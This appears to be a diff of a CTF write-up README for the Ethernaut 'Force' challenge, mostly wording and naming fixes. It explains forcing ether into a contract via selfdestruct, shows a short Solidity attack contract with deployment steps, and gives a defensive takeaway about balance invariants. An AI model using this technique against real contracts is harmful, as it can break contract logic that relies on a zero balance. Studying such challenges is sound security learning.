AndrewPrasaath/Web3-CTFs/Ethernaut/README.md

 ```
 ### Solution
 ##### Explanation
 There are two ways to send ether to a contract without their permission.
-One is via the coinbase account where the miner provide contract address instead of theirs to get minning reward.
+One is via the coinbase account where the miner provides a contract address instead of theirs to get a minning reward.
 Another way is through `selfdestruct`.\
-When a contract selfdestruct, it can provide an address to send the balance in it.
-By creating a contract with balance and self destructing it by providing the instance address will clear this challenge.
+When a contract self-destructs, it can provide an address to send the balance in it.
+Creating a contract with balance and self-destructing it by providing the instance address will clear this challenge.
 ##### Exploit
 ```
 contract AttackForce {
-    Force public target;
+    Force public immutable targetContractAddress;

-    constructor(Force _target) payable {
+    constructor(Force _targetContractAddress) payable {
-        target = _target;
+        targetContractAddress = _targetContractAddress;
     }

     function attack() external {
-        selfdestruct(payable(address(target)));
+        selfdestruct(payable(targetContractAddress));
-        assert(address(target).balance > 0);
+        assert(targetContractAddress.balance > 0);
     }
 }
 ```
-1. Deploy above contract with 1 wei.
+1. Deploy the above contract with 1 wei.
-2. Call `attack()` to selfdestruct and send the balance to `Force` contract.\
+2. Call `attack()` to self-destruct and send the balance to the `Force` contract.\
-That's it, now `Force` contract have non zero balance (you can check it in etherscan).
+That's it, now the `Force` contract has a non-zero balance (you can check it in Etherscan).
 ##### Takeaway from Ethernaut
 In solidity, for a contract to be able to receive ether, the fallback function must be marked payable.\
 However, there is no way to stop an attacker from sending ether to a contract by self-destroying.
 Hence, it is important not to count on the invariant address(this).balance == 0 for any contract logic.